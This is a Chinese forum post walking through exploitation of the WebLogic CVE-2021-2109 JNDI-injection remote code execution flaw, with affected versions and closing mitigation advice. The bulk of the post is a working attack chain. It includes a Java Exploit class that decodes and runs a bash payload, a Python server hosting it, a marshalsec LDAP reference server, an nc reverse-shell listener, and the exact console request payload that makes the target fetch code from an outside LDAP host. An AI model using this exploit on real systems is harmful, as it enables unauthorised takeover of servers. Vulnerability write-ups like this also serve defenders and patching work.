CVE-2021-2109 Weblogic RCE

gclome · 发表于 2021-1-21 21:20:39

原文链接：CVE-2021-2109 Weblogic RCE

0x00 漏洞简介
Oracle官方发布了漏洞补丁，修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。

0x01 影响版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

0x02 环境搭建
我用的是14883的靶场，网上很多docker的搭建教程，请自行百度
搞定后是下面这样

0x03 漏洞利用
首先编译一个java文件（bash要base64）

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
//Process p = Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo'base64编码'|base64 -d |bash"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}

复制代码

然后把class拉到服务器启动python服务

python -m SimpleHTTPServer 80

复制代码

访问服务器，能看到资源就是启动成功

启动exphttp服务启动ldap服务

java -cpmarshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip.ip.ip.ip/\#Exploit 9998

复制代码

nc端口开启监听

nc -lvnp xxxx

复制代码

执行exp,反弹shell成功（get,post都可以）

exp(注意ip是 1.1.1；1 有个分号)

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:9998/s4dzak;AdminServer%22)

复制代码

0x03 修复建议1、禁用T3协议进入Weblogic控制台，在base_domain配置页面中，进入“安全”选项卡页面，点击“筛选器”，配置筛选器在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则框中输入：* * 7001 deny t3 t3s2、禁止启用IIOP登陆Weblogic控制台，找到启用IIOP选项，取消勾选，重启生效3、临时关闭后台/console/console.portal对外访问4、升级官方安全补丁

		自动登录	找回密码
密码			立即注册